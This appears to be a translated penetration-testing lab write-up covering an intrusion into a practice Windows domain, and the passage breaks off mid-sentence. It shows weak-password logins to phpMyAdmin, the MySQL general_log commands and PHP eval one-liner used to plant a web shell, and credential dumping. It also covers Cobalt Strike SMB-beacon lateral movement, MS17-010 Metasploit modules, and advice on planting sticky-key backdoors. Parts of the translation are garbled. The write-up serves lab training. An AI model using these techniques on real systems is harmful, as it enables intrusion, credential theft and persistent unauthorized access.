Title: Use Smb to get the network host

0x00 Introduction

Before, when I was using a domain environment, the host in the domain did not leave the network. At that time, the socks proxy used to proxy the traffic that did not leave the network host to the edge host. I didn't think too much about it at that time. After I came down, I thought of setting up an environment to reproduce the situation at that time and see if there is a simpler way to build a host that cannot be installed.

By chance, I found that the environment in this domain is pretty good. During the reproduction process, some knowledge touched my knowledge blind spots and gained a lot of new knowledge. I specially recorded the process and shared it with the masters who want to learn to build a network host in the domain.

0x01 Range address allocation

Intranet segment: 192.168.52.0/24

External network segment: 192.168.10.0/24

Attack aircraft:

kali: 192.168.10.11

range:

win7 (inside): 192.168.52.143

win7 (external): 192.168.10.15

Domain host:

Winserver2003:192.168.52.141

Winserver2008:192.168.52.138

Among them, win7 can communicate with external network and intranet, and the hosts in the domain can only communicate between intranets.

At the beginning, DCping does not work with win7, and after closing the firewall, you can ping it.

Open the phpstudy directory under C drive to open the web service

0x02 web server penetration

nmap probe port

nmap -sS -P0 -sV -O 192.168.10.15

Opened port 80, tried to access the web address, found it is a php probe

Slide to the bottom and find a MySQL database connection detection at the bottom of the website

Weak password root/root connection is successful

Scan the background

I use the sword here, but it seems to be very hard, because after I finished shooting this shooting range and went online to see that many of them scan out a cms, and they can also get the shell through cms. I won’t demonstrate how to use the weak cms password to enter the background to write the shell. If you are interested, you can search it yourself.

I found out that the phpmyadmin directory is or the weak password of root/root login is successful

The interface after entering is as follows

0x03 Write shell through phpmyadmin

There are two ways to write shells through phpmyadmin

First I tried to write to select into outfile directly, but the value of secure_file_priv here is NULL, so the privilege cannot be raised.

Only use another method, write shells using global logs

SHOW VARIABLES LIKE '%general%'

Check the configuration and you can see that the global log is in a closed state. The general_log_file returns the absolute address of the log.

Then I will open its global log first, and then write a sentence Trojan into its path

set global general_log=on;

After opening the global log, modify the absolute path. Note that there is a pit here. The path returned by the log is C:\\phpStudy\\MySQL\\data\stu1.log, but the absolute address accessed by mysql is C:\\phpStudy\\WWW directory, so you must write the shell in this place to the WWW directory before you can connect to it with an ant sword.

set global general_log_file='C:\\phpStudy\\WWW\\shell.php';

Here is another sentence Trojan

select '?php eval($_POST[cmd]);'

Then connect the ant sword

You can see that the connection is successful

0x03 Intranet information collection

Check the system permissions, it is very comfortable to have the administrator permissions as soon as you start

ipconfig /all view network information, domain environment + dual network card

Tasklist /svc looked at it briefly and it seemed that there was no such thing as a squid.

Thinking that there is no soft-soft killing, it is easier to use the simplest and crudest cs to upload a Trojan exe generated by cs to the target host.

Use planned tasks to go online cs

Successfully launched

0x04 Intranet penetration

Information Collection

net view view domain information

Use the port provided by CSS to scan a wave of hosts

Scan out all hosts as follows

hashdump catch a wave of hash

Logonpasswords capture a wave of plain text

All credentials are as follows. The reason for coding is that the password was reset when logging in before, and I got a password with personal information.

Thoughts

I tested it here, because the target host does not have a firewall enabled, it can use the Psexec built with CSS to capture the domain control and the computer password in the domain in a horizontal manner. However, given the situation where the win7 dual network card and other hosts in the domain cannot leave the network, practice how to not get out of the host.

There are generally the following ways to go online without the Internet:

Use smb beacon to configure listener online through HTTP proxy Use pystinger to build socks4 proxy Here I use SMB beacon method

SMB

Beacon uses a named pipe to communicate through the parent Beacon. When two Beacons are linked, the child Beacon gets the task from the parent Beacon and sends it. Because the linked Beacons uses Windows named pipes for communication, this traffic is encapsulated in the SMB protocol, so SMB

Beacon is relatively hidden. SMB beacon cannot directly generate available loads, it can only be launched using PsExec or Stageless Payload.

First, get the beacon of a host in the intranet, grab the password and perform smb injection, and get the administrator account password on another machine with open port 445. If the target machine does not leave the network, you can use Smb

Beacon brings the target host online

1. Conditions of use

Hosts with SMB Beacon must accept connections on port 445. Only links to Beacons managed by the same Cobalt Strike instance. To use this beacon horizontal movement, you must have administrator rights or credentials with administrator rights on the target host. 2. How to use

(1) Create smb listener

(2) Use psexec in cs for horizontal movement, select the existing beacon as a springboard, the credentials must be administrator

, that is, have the target host administrator privileges

(3) The connection is successful, you can see that there is a ∞∞ logo on the right side of the host on smb beacon

The machine that uses this method to go online mainly through the network outgoing machine as an intermediary. After the host without the network is successfully launched, if the host without the network is disconnected, the host without the network will also be disconnected.

0x05 Intranet horizontal penetration

Thoughts

Use Ladon to scan the Eternal Blue of the Intranet and find that these hosts all have MS17-010

Several common ways of playing ms17010:

msfladon/ladon_ms17010 I have tried these ways of execs plug-in in exessus separated from msf. I won't describe the process one by one, just talk about the results of my test

msf is the most stable, but it is a little troublesome to fight because you need to set up monitoring modules and select attack modules. ladon_ms17010 is convenient but not very stable sometimes fails to play. The CSS plug-in is not stable, and the success rate will be lower if the network is not stable without the network.

In this case of not leaving the network, you can give priority to using exe and ladon_ms17010 separated from msf to hit. Successfully, a new user will be created through the custom dll and joined the administrator group, opening port 3389, and a sticky key backdoor will be left.

According to the actual situation, you can consider logging in remotely directly under the appropriate time period and conditions and flipping through sensitive data, which often brings a lot of convenience to penetration due to many "good habits" of operation and maintenance personnel, such as "password book.txt"

cs derived msf session

msf sets the listening port

Create a new port to create a conversation

Run to get meterpreter

ms_17_010 Obtain domain control permissions

Here I know that DC has the vulnerability of ms_17_010, so I first tried to use Eternal Blue to hit it.

Use the following module

exploit/windows/smb/ms17_010_eternalblue

After running, I found that exp has been hit but no session has been established

Change the ms17010 module

use exploit/windows/smb/ms17_010_psexec

set payload windows/meterpreter/blind_tcp

I didn't get the shell either. I didn't think about it carefully at that time. Later, I considered that it might be because Win7 was in two network segments, so I couldn't get the shell by directly hitting Eternal Blue.

msf cannot output the network machine's ms_17_010

I thought of getting the meterpreter for win7 before, so I tried it by adding routes

Msf is still very stable and fragrant when fighting alone. After win7 was launched in msf, we already knew in advance that there are 5